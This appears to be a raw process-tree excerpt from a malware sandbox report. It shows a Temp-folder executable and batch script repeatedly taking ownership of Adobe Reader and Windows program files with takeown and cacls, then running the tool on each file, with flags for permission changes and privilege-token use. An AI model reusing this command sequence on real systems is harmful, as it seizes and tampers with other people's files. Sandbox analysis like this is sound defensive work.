C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1948
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca""2⤵PID:1108
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca" /E /G Admin:F /C3⤵PID:1772
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca"3⤵PID:208
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "usa.fca" -nobanner3⤵PID:972
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "usa.fca" -nobanner4⤵PID:1936
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1028
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT""2⤵PID:756
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT" /E /G Admin:F /C3⤵PID:1096
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT"3⤵PID:1896
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "CENTEURO.TXT" -nobanner3⤵PID:1564
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "CENTEURO.TXT" -nobanner4⤵PID:1580
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:484
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT""2⤵PID:1960
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT" /E /G Admin:F /C3⤵PID:1412
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT"3⤵PID:932
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "SYMBOL.TXT" -nobanner3⤵PID:216
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "SYMBOL.TXT" -nobanner4⤵PID:236
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1840
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT""2⤵PID:1752
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT" /E /G Admin:F /C3⤵PID:208
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT"3⤵
- Modifies file permissions
PID:1888
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "CP1257.TXT" -nobanner3⤵PID:1876
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "CP1257.TXT" -nobanner4⤵PID:548
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1912
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif""2⤵PID:940
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif" /E /G Admin:F /C3⤵PID:1896
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif"3⤵
- Modifies file permissions
PID:1416
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "br.gif" -nobanner3⤵PID:1788
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "br.gif" -nobanner4⤵PID:1860
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:756
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif""2⤵PID:1512
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif" /E /G Admin:F /C3⤵PID:932
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif"3⤵PID:292
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "forms_received.gif" -nobanner3⤵PID:1128
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "forms_received.gif" -nobanner4⤵PID:1892
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1080
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif""2⤵PID:1772
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif" /E /G Admin:F /C3⤵PID:1888
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif"3⤵PID:280
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "reviews_joined.gif" -nobanner3⤵PID:972
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "reviews_joined.gif" -nobanner4⤵PID:1608
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:964
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif""2⤵PID:1096
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif" /E /G Admin:F /C3⤵PID:1416
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif"3⤵
- Modifies file permissions
PID:848
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "server_issue.gif" -nobanner3⤵PID:1564
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "server_issue.gif" -nobanner4⤵PID:228
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1168
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif""2⤵PID:1412
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif" /E /G Admin:F /C3⤵PID:292
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif"3⤵PID:1820
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner3⤵PID:216
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner4⤵PID:1808
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1512
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf""2⤵PID:208
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf" /E /G Admin:F /C3⤵PID:280
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf"3⤵PID:524
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "AdobePiStd.otf" -nobanner3⤵PID:1876
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "AdobePiStd.otf" -nobanner4⤵PID:204
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:232
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf""2⤵PID:1896
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf" /E /G Admin:F /C3⤵PID:848
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf"3⤵
- Modifies file permissions
PID:1468
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "MinionPro-Regular.otf" -nobanner3⤵PID:1788
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "MinionPro-Regular.otf" -nobanner4⤵PID:1344
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1580
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB""2⤵PID:932
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB" /E /G Admin:F /C3⤵PID:1820
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB"3⤵PID:968
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "SY______.PFB" -nobanner3⤵PID:1128
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "SY______.PFB" -nobanner4⤵PID:900
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:224
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt""2⤵PID:1888
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt" /E /G Admin:F /C3⤵PID:524
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt"3⤵
- Modifies file permissions
PID:380
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner3⤵PID:972
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner4⤵PID:1372
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:208
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths""2⤵PID:1416
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths" /E /G Admin:F /C3⤵PID:1468
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths"3⤵
- Modifies file permissions
PID:944
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "can03.ths" -nobanner3⤵PID:1788
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "can03.ths" -nobanner4⤵PID:1324
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1756
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths""2⤵PID:292
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths" /E /G Admin:F /C3⤵PID:968
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths"3⤵
- Modifies file permissions
PID:1816
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "usa03.ths" -nobanner3⤵PID:216
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "usa03.ths" -nobanner4⤵PID:2016
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1840
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT""2⤵PID:280
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT" /E /G Admin:F /C3⤵PID:380
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT"3⤵PID:1952
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "CROATIAN.TXT" -nobanner3⤵PID:1876
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "CROATIAN.TXT" -nobanner4⤵PID:300
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1108
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT""2⤵PID:848
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT" /E /G Admin:F /C3⤵PID:944
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT"3⤵PID:1860
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "UKRAINE.TXT" -nobanner3⤵PID:1908
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "UKRAINE.TXT" -nobanner4⤵PID:1896
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1376
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui""2⤵PID:1820
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui" /E /G Admin:F /C3⤵PID:1236
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:224
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "msoeres.dll.mui" -nobanner3⤵PID:1128
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "msoeres.dll.mui" -nobanner4⤵PID:468
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:296
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe""2⤵PID:524
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C3⤵PID:1952
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1800
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "ImagingDevices.exe" -nobanner3⤵PID:1876
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "ImagingDevices.exe" -nobanner4⤵PID:1888
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:204
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui""2⤵PID:916
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui" /E /G Admin:F /C3⤵PID:484
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui"3⤵
- Modifies file permissions
PID:928
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "jnwmon.dll.mui" -nobanner3⤵PID:1904
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "jnwmon.dll.mui" -nobanner4⤵PID:1416
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:940
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp""2⤵PID:1816
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp" /E /G Admin:F /C3⤵PID:864
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp"3⤵
- Modifies file permissions
PID:1912
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "Dotted_Line.jtp" -nobanner3⤵PID:1808
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "Dotted_Line.jtp" -nobanner4⤵PID:296
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:900
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files\Windows Journal\Templates\Shorthand.jtp""2⤵PID:208
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Shorthand.jtp" /E /G Admin:F /C3⤵PID:1204
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Shorthand.jtp"3⤵PID:1108
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "Shorthand.jtp" -nobanner3⤵PID:756
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "Shorthand.jtp" -nobanner4⤵PID:896
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1780
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""2⤵PID:212
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:1080
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"3⤵PID:1376
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:1512
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵PID:940
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:944
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html""2⤵PID:1960
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html" /E /G Admin:F /C3⤵PID:292
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html"3⤵
- Modifies file permissions
PID:1820
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "license.html" -nobanner3⤵PID:1808
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "license.html" -nobanner4⤵PID:548
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1804
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer""2⤵PID:1752
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer" /E /G Admin:F /C3⤵PID:1108
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer"3⤵
- Modifies file permissions
PID:1936
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "pmd.cer" -nobanner3⤵PID:1168
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "pmd.cer" -nobanner4⤵PID:1324
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:972
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif""2⤵PID:1344
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif" /E /G Admin:F /C3⤵PID:916
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif"3⤵PID:968
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "distribute_form.gif" -nobanner3⤵PID:1236
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "distribute_form.gif" -nobanner4⤵PID:236
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:228
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif""2⤵PID:1424
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif" /E /G Admin:F /C3⤵PID:900
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif"3⤵PID:548
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "form_responses.gif" -nobanner3⤵PID:1952
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "form_responses.gif" -nobanner4⤵PID:1804
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:216
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif""2⤵PID:1372
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif" /E /G Admin:F /C3⤵PID:524
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif"3⤵
- Modifies file permissions
PID:1324
-
-
